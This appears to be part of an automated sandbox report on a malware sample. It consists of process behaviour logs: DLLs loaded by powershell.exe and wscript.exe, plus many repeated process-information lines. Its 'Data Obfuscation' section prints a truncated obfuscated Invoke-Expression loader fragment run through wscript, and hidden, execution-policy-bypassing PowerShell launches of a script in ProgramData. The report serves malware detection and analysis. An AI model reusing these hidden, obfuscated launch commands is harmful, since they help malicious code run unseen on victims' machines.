            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 1", "0", "true");
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01067DA0 push eax; iretd 11_2_01067DA1
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
